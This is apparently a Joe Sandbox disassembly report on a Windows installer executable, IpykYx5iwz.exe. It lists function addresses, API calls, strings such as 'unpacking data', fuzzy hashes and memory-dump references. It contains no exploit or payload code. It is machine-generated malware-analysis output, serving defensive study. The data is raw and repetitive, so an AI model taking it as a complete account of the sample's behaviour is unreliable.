Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N$r%[
API String ID: 3103080414-31240083
Opcode ID: 72a3c28b782e43d93af6a515465b4a3c8a00c1c9b326746d399ca05344fe1376
Instruction ID: 25b6b162fa7d48e4e961d9928df0462ddf83e59e31dd5b95d6ec5816e65db8cb
Opcode Fuzzy Hash: 72a3c28b782e43d93af6a515465b4a3c8a00c1c9b326746d399ca05344fe1376
Instruction Fuzzy Hash: 6E6182B1A00209BBDF109F61DD45B6A7B69FF84710F10813AFB15BA1D1C7B8A951CF98

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 70a1a6841c1126847f7f0a67fc0902e6e1e74352a81e7501bbba8acc6fe4905f
Instruction ID: 2cfb6452d3ed2adb0490a6fda74b90e1dfbf7fcab0fd01839bab840ee2ffb3d6
Opcode Fuzzy Hash: 70a1a6841c1126847f7f0a67fc0902e6e1e74352a81e7501bbba8acc6fe4905f
Instruction Fuzzy Hash: 07418D71400209AFCB058F95DE459AF7BB9FF45315F00802EF5A1AA1A0C7349955DFA4

Function 00405DB0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405F41,?,?), ref: 00405DE1
GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405DEA

Part of subcall function 00405C3F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C4F
Part of subcall function 00405C3F: lstrlenA.KERNEL32(00000000,?,00000000,00405E9A,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C81

GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405E07
wsprintfA.USER32 ref: 00405E25
GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405E60
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E6F
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405EA7
SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405EFD
GlobalFree.KERNEL32(00000000), ref: 00405F0E
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405F15

Part of subcall function 00405CDA: GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\IpykYx5iwz.exe,80000000,00000003), ref: 00405CDE
Part of subcall function 00405CDA: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D00

Strings

[Rename], xrefs: 00405E8F, 00405EA1
%s=%s, xrefs: 00405E1B

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %s=%s$[Rename]
API String ID: 2171350718-1727408572
Opcode ID: 5501a8743dec453e105ac9914011c0504f14abb99d4cf86462dec57fc9e2f0ce
Instruction ID: 443431a376db42b7d779c0f12c1ecf66d6c3f5619bcb6008fb44dfcbbf8babb0
Opcode Fuzzy Hash: 5501a8743dec453e105ac9914011c0504f14abb99d4cf86462dec57fc9e2f0ce
Instruction Fuzzy Hash: B5312631204B15BBD2207B65AE49F6B3A5CDF81714F14043BF942F62D2DA7CD9028ABD

Function 004063AB Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\IpykYx5iwz.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406403
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406410
CharNextA.USER32(?,"C:\Users\user\Desktop\IpykYx5iwz.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406415
CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00406425

Strings

"C:\Users\user\Desktop\IpykYx5iwz.exe", xrefs: 004063E7
*?|<>/":, xrefs: 004063F3
C:\Users\user\AppData\Local\Temp\, xrefs: 004063AC

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\IpykYx5iwz.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4002828413
Opcode ID: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
Instruction ID: a9374e22e98c4dc303b182c9b737662c14652e6601d1bee761dd9fa1fda1dddb
Opcode Fuzzy Hash: 42c4a3e1a2d6554428903665c9d613c7fc86cd3241a92e9ce5ad7ed014b00af2
Instruction Fuzzy Hash: CF1104618047A129EB3206281C44BB77FD84F57760F19507BE9C6722C2C67C5C6687AD

Function 00404236 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404253
GetSysColor.USER32(00000000), ref: 00404291
SetTextColor.GDI32(?,00000000), ref: 0040429D
SetBkMode.GDI32(?,?), ref: 004042A9
GetSysColor.USER32(?), ref: 004042BC
SetBkColor.GDI32(?,?), ref: 004042CC
DeleteObject.GDI32(?), ref: 004042E6
CreateBrushIndirect.GDI32(?), ref: 004042F0

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction ID: 8c367e47b4306476cf29da68a02135d76106e82033ebf96affcab25eba3a867f
Opcode Fuzzy Hash: 2fd397ab70c88e7053abfa2b1889d7e6adf273714bf8f91ffd366fbe1d5efa4b
Instruction Fuzzy Hash: 362195716007049BCB319F68D948B5BBBF8AF41750B04897EFE96A26E0C734D944CB64

Function 00404B22 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404B3D
GetMessagePos.USER32 ref: 00404B45
ScreenToClient.USER32(?,?), ref: 00404B5F
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404B71
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B97

Strings

f, xrefs: 00404B73

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction ID: 39453513f114f2a688c797cc76a53a354442de9c6c07e73bdd5afe949bfa8100
Opcode Fuzzy Hash: b233b2991907e98a40282691d164461162982266b543cde43f51771bab81e11a
Instruction Fuzzy Hash: 1A015E75D00218BAEB00DB94DD85FFEBBBCAF55711F10412BBA50F61D0C7B4A9458BA4

Function 00401DFF Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E02
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
ReleaseDC.USER32(?,00000000), ref: 00401E35
CreateFontIndirectA.GDI32(0040B800), ref: 00401E84

Strings

Calibri, xrefs: 00401E6A

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Calibri
API String ID: 3808545654-1409258342
Opcode ID: ec317d6961eb5a40142d6124600cd79e05fcd104c94089ce05635f40ddb41806
Instruction ID: 0be634766171be457783ff79a9756eb1f19897d62519dac9fb9e1121949108d1
Opcode Fuzzy Hash: ec317d6961eb5a40142d6124600cd79e05fcd104c94089ce05635f40ddb41806
Instruction Fuzzy Hash: E0015672505244AFE7016B70AE49B9A3FFCEB55305F148839F141BA2F3C7B405058BAD

Function 00402CDD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402CF8
wsprintfA.USER32 ref: 00402D2C
SetWindowTextA.USER32(?,?), ref: 00402D3C
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402D4E

Strings

verifying installer: %d%%, xrefs: 00402D21
unpacking data: %d%%, xrefs: 00402D1A, 00402D2A

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: d3a9d30f302aba9d5f1f3cb283cc925375bf2961cd4d7741ae71dd4627f18e8c
Instruction ID: d8b1f7c19252c76547d0ac26773f92b51ee34845b2b999cc677ac46ee6bff0cf
Opcode Fuzzy Hash: d3a9d30f302aba9d5f1f3cb283cc925375bf2961cd4d7741ae71dd4627f18e8c
Instruction Fuzzy Hash: 75F01D7150020DABEF206F50DE1ABAE3669EB04345F00803AFA06B51D0DBB89D568B99

Function 004027A3 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027F7
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402813
GlobalFree.KERNEL32(?), ref: 0040284C
GlobalFree.KERNEL32(00000000), ref: 0040285F
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402877
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040288B

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 41f61d2aad339b9bb2ff121ff6e715b3c55d7bfcc8d873eefeecb9c7bcb2b76b
Instruction ID: 81d5057223690197c1e699a61141c161be386b669f751160d25d8bfdf59f5f06
Opcode Fuzzy Hash: 41f61d2aad339b9bb2ff121ff6e715b3c55d7bfcc8d873eefeecb9c7bcb2b76b
Instruction Fuzzy Hash: 17214A72C00224ABDF217FA58D49DAE7F79EF05364B10823AF520762E1CB7949428F98

Function 00404A18 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(helsidesannoncen: Installing,helsidesannoncen: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404933,000000DF,00000000,00000400,?), ref: 00404AB6
wsprintfA.USER32 ref: 00404ABE
SetDlgItemTextA.USER32(?,helsidesannoncen: Installing), ref: 00404AD1

Strings

%u.%u%s%s, xrefs: 00404AA0
helsidesannoncen: Installing, xrefs: 00404AA8, 00404AAD, 00404AB3, 00404AC7

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$helsidesannoncen: Installing
API String ID: 3540041739-234470379
Opcode ID: 69e60dc288c2aae71eae8495adc4475713b7f0031b27455c4aed30d6fedd597e
Instruction ID: 283b724f563733faa375caf007583819479a8bdae971eeac84f96503b42fc0b0
Opcode Fuzzy Hash: 69e60dc288c2aae71eae8495adc4475713b7f0031b27455c4aed30d6fedd597e
Instruction Fuzzy Hash: B311E777A0412437DB0065B99C42EAF329CDB85334F250237FA26F61D1E9788C1286AC

Function 00401D41 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D58
GetClientRect.USER32(?,?), ref: 00401D9F
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
DeleteObject.GDI32(00000000), ref: 00401DF4

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: dfcfee733441120872404f1362752f9737f9264160297f8557c304d9fc30a6ce
Instruction ID: 4e2990ac6a4ffc21ac5b981bdbb81ef568083f955646f0f466aa61fc58f6164b
Opcode Fuzzy Hash: dfcfee733441120872404f1362752f9737f9264160297f8557c304d9fc30a6ce
Instruction Fuzzy Hash: E5215172E00109AFDB05DF98DE44AEEBBB9FB48300F11413AF955F62A1CB789941CB58

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783912754.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_IpykYx5iwz.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: da175abb4f003f4507e1b1c7c2270da77c9b2dc8e44ccc016535c95a43b1b010
Instruction ID: 4dd2caf9872ce2c472bdea934ff98caf8c51944457e5ccf01e556c8d58d08a81
Opcode Fuzzy Hash: da175abb4f003f4507e1b1c7c2270da77c9b2dc8e44ccc016535c95a43b1b010
Instruction Fuzzy Hash: DF216BB1944208BEEF06AFA4D98AAAD7FB5EF84304F10457EF501B61D1C7B88640DB18

Function 00405AD9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403371,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00405ADF
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403371,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403596,?,00000006,00000008,0000000A), ref: 00405AE8
lstrcatA.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405AF9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405AD9

Memory Dump Source

Source File: 00000000.00000002.1783809564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1783784642.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783823319.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1783835242.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
